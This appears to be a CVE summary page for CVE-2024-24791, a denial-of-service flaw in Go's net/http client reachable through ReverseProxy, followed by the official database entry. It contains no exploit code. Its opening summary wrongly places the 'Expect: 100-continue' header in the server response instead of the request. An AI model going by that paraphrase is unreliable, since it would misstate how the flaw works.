Go net/http: Denial of Service (CVE-2024-24791) #shorts #breaking

CVE

This CVE relates to a Denial of Service vulnerability in the Go standard library's net/http package. Specifically, versions before 1.21.12 and versions 1.22.0 up to but not including 1.22.5 are affected. The issue occurs when an HTTP/1.1 client handles a server response that contains an 'Expect: 100-continue' header followed by a non-informational status code, which is a code 200 or higher. This improper handling can leave the client connection in an invalid state, causing the next request on the same connection to fail. Attackers can exploit this vulnerability by sending such requests through a net/http/httputil.ReverseProxy proxy, leading to a denial of service. This happens because each malicious request leaves a proxy connection in an unusable state, causing subsequent requests to fail.

Watch the full video on YouTube: CVE-2024-24791

Remediation and exploitation details

This chain involves the following actors

This following systems are involved

Attack entry point

Remediation actions

Exploitation actions

Related Content

NOTE: The following related content has not been vetted and may be unsafe.

CVE database technical details

CVE ID
CVE-2024-24791
Description
The net/http HTTP/1.1 client mishandled the case where a server responds to a request with an "Expect: 100-continue" header with a non-informational (200 or higher) status. This mishandling could leave a client connection in an invalid state, where the next request sent on the connection will fail. An attacker sending a request to a net/http/httputil.ReverseProxy proxy can exploit this mishandling to cause a denial of service by sending "Expect: 100-continue" requests which elicit a non-informational response from the backend. Each such request leaves the proxy with an invalid connection, and causes one subsequent request using that connection to fail.
Provider
Go
CWE / problem types
CWE 400: Uncontrolled Resource Consumption
Affected Software Versions
Go standard library:net/http:[{'version': '0', 'lessThan': '1.21.12', 'status': 'affected', 'versionType': 'semver'}, {'version': '1.22.0-0', 'lessThan': '1.22.5', 'status': 'affected', 'versionType': 'semver'}]
Date Published
2024-07-02T21:28:25.677Z
Last Updated
2024-10-04T15:02:46.565Z